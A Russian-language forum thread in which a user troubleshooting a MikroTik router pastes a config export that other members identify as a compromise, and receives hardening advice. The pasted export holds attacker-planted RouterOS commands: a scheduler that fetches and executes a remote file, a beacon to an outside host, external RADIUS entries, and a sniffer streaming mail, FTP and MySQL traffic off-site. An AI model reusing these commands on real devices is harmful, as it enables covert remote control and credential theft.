weedman Опубликовано 1 июля, 2018 · Жалоба Здравствуйте. Проблема в самопроизвольном появлении записей в статик днс, сайты перестают грузиться, после сброса все работает как следует. В логах ничего не увидел, с какой стороны эта проблема? Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
SSD Опубликовано 1 июля, 2018 · Жалоба 25 минут назад, weedman сказал: Здравствуйте. Проблема в самопроизвольном появлении записей в статик днс, сайты перестают грузиться, после сброса все работает как следует. В логах ничего не увидел, с какой стороны эта проблема? На какие сайты появляются записи? Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
weedman Опубликовано 1 июля, 2018 (изменено) · Жалоба 1 час назад, SSD сказал: На какие сайты появляются записи? Большой список, просто портянка там что-то и с андройдом было связано 1tv кажется какой-то, я очистил уже и не сделал сриншот. при повторении выложу. это уже третий раз в этом месяце в разных местах Изменено 1 июля, 2018 пользователем weedman Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
saaremaa Опубликовано 1 июля, 2018 · Жалоба Прошивка? Export /ip service Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
weedman Опубликовано 1 июля, 2018 (изменено) · Жалоба Заблокировал на input все кроме внутренней сети и впн для управления, проблема та же. часть сайтов открывает, часть нет. прошивку, экспорт и ip сервис к сожалению сейчас не смогу выложить возможно проблема не в этом. но недели три назад та же хрень была на моем домашнем роутере и очистка кэша помогла, тут же после этого сразу все возвращается (записи и неработоспособность ВАЖНОЕ ДОПОЛНЕНИЕ- проблема не со статик днс, а с кэшем Изменено 1 июля, 2018 пользователем weedman дополнение Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
McSea Опубликовано 1 июля, 2018 (изменено) · Жалоба 2 hours ago, weedman said: ВАЖНОЕ ДОПОЛНЕНИЕ- проблема не со статик днс, а с кэшем Хехе, это ж из разряда и не выиграл, а проиграл... Ну вообще ж разные списки, кэш заполняется из ответов DNS серверов на ваши запросы. Попробуйте прописать в IP - DNS - Servers что-нибудь типа 8.8.8.8/8.8.4.4 или 1.1.1.1/1.0.0.1 А Use Peer DNS отключите, если используется. Хотя как-то не очень уверен, что проблема именно в DNS. Изменено 1 июля, 2018 пользователем McSea Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
weedman Опубликовано 2 июля, 2018 (изменено) · Жалоба 6 часов назад, McSea сказал: Хехе, это ж из разряда и не выиграл, а проиграл... Ну вообще ж разные списки, кэш заполняется из ответов DNS серверов на ваши запросы. Попробуйте прописать в IP - DNS - Servers что-нибудь типа 8.8.8.8/8.8.4.4 или 1.1.1.1/1.0.0.1 А Use Peer DNS отключите, если используется. Хотя как-то не очень уверен, что проблема именно в DNS. используются 8.8.8.8 и 8.8.4.4, use peer dns отключал. после блокировки Input эти записи стали появляться меньше. на домашнем компе проблема решилась, а в этой ситуации (рабочей) все так же. Ip-Service все по дефолту, не менялось ничего ни в одном случае Изменено 2 июля, 2018 пользователем weedman дополнение Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
McSea Опубликовано 2 июля, 2018 (изменено) · Жалоба 6 hours ago, weedman said: после блокировки Input эти записи стали появляться меньше. на домашнем компе проблема решилась, а в этой ситуации (рабочей) все так же. Если используется микротик как DNS сервер (точнее сказать кэширующий прокси), в кэше обязательно будет куча записей, это более чем нормально. Зачем нужен кэш, нужно объяснять ? Записи там не от фонаря, а те, что (в вашем случае) DNS гугла выдает. Произвольный адрес туда не прописать, в RouterOS и команды нет такой, только очистка (как и должно быть в случае кэша). Однако надо закрывать доступ к нему снаружи, просто чтобы не создавалась лишняя нагрузка на роутер. В дефолтовом конфиге именно так, input закрыт с WAN весь, кроме icmp. Возьмите какой-либо проблемный сайт, DNS микротика и внешние DNS должны выдавать одинаковые адреса для него. Напр. запрос "nslookup site.ru 192.168.8.1" (или какой у вас адрес) для микротика, и "nslookup site.ru 9.9.9.9" для DNS сервера quad9. Изменено 2 июля, 2018 пользователем McSea Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
Saab95 Опубликовано 2 июля, 2018 · Жалоба Просто нужно убрать с микротика белый IP (перенести DNS на отдельное устройство с серыми адресами) тогда и фильтры никакие не потребуются. Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
McSea Опубликовано 2 июля, 2018 (изменено) · Жалоба 2 hours ago, Saab95 said: Просто нужно убрать с микротика белый IP (перенести DNS на отдельное устройство с серыми адресами) тогда и фильтры никакие не потребуются. И куда же этот белый IP в типичной домашне-офисной сети предлагаете повесить ? Может на стене в рамочке ? Вы бы не путали домашне-офисные сети с провайдерскими, это провайдерам фильтр не нужен, особенно на транзит, т.к. абоненты должны иметь 100% открытый инет доступ, которого почему-то не имеют. Изменено 2 июля, 2018 пользователем McSea Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
weedman Опубликовано 2 июля, 2018 · Жалоба Всем откликнувшимся спасибо. Сегодня было установлено, что проблема в другом. блокируются сервисы по http, https работает нормально. сделал экспорт, попробую разобраться в причине сам, если не смогу, обращусь. еще раз спасибо. На днс подумал потому что недавно была такая проблема и решилась очисткой кэша, блокировка может и не дала ничего. брожу в темной комнате на ощупь. Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
weedman Опубликовано 3 июля, 2018 · Жалоба 18 часов назад, Saab95 сказал: Просто нужно убрать с микротика белый IP (перенести DNS на отдельное устройство с серыми адресами) тогда и фильтры никакие не потребуются. Вот это там явно появилось не по моей воле. какие у вас мысли? /ip proxy set port=42216 /ppp aaa set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes /radius add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp /radius incoming set accept=yes /system scheduler add interval=2h name=a on-event=ip policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif]=\"\") do={\r\ \n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\ \n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.rif\r\ \n}\r\ \nexecute [/file get autosupout1.rif contents]" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=jan/01/1970 start-time=00:00:00 /system script add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=5bc24d5c0d\ 21bf27&action=upload&sncode=06E212D666C4043D2C2E7C2B0202CA53&dynamic=static\") keep-result=no}" /tool sniffer set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp filter-port=ftp,pop3,143,mysql filter-stream=yes streaming-enabled=yes streaming-server=77.222.54.45 Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
Constantin Опубликовано 3 июля, 2018 · Жалоба я худею с комментаторов., тут 100 пудовый пролом статик днс от нормальной работы не появиться, тем более настройки прокси, все это внесено либо ручками либо скриптом 2 ТС, обновлять прошивку до актуальной стабильной, сбрасывать роутер в дефаулт и настраивать заново, это проще чем выковыривать что то левое, ставить нормальный пароль, для доступа на роутер ставить маски на адреса на сервисы winbox telnet ssh , остальные сервыисы отключать нах... и тд и тп не забывать про доступ из вне к днс микротика если вы им пользуетесь Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
weedman Опубликовано 3 июля, 2018 · Жалоба 20 минут назад, Constantin сказал: я худею с комментаторов., тут 100 пудовый пролом статик днс от нормальной работы не появиться, тем более настройки прокси, все это внесено либо ручками либо скриптом 2 ТС, обновлять прошивку до актуальной стабильной, сбрасывать роутер в дефаулт и настраивать заново, это проще чем выковыривать что то левое, ставить нормальный пароль, для доступа на роутер ставить маски на адреса на сервисы winbox telnet ssh , остальные сервыисы отключать нах... и тд и тп не забывать про доступ из вне к днс микротика если вы им пользуетесь сбросил на заводские, прошивка пока 6.35.4 stable После перезагрузки захожу на speedtest.net (http), начинаю проверку, сначала все идет нормально, а при проверке исходящего (примерно 20 сек от начала) выходит ошибка. обновляю страницу и гугл переводчик говорит что дальше все написано на странице по малазийски. в экспорте ничего подозрительного на этот раз нет. попробую прошить нетинсталом 6.40.7 Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
Constantin Опубликовано 3 июля, 2018 · Жалоба 2 минуты назад, weedman сказал: прошить нетинсталом 6.40.7 прошивайте 6,42,5 и не ипите тут мосги народу что 3,35 что 6,40 дырявые прошивки. либо сначала фильтра потом уже в инет выпускайте...что за люди, если нет знаний и опыта то делайте что вам говорят, не нужно от себятины чтоб по новому кругу проблеммы глотать Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
weedman Опубликовано 3 июля, 2018 (изменено) · Жалоба 4 минуты назад, Constantin сказал: прошивайте 6,42,5 и не ипите тут мосги народу что 3,35 что 6,40 дырявые прошивки. принято Изменено 3 июля, 2018 пользователем weedman Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
McSea Опубликовано 3 июля, 2018 (изменено) · Жалоба 5 hours ago, Constantin said: прошивайте 6,42,5 и не ипите тут мосги народу что 3,35 что 6,40 дырявые прошивки. в последнем bugfix-е 6.40.8 все дырки (известные) закрыты, так же как и в текущем stable Изменено 3 июля, 2018 пользователем McSea Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...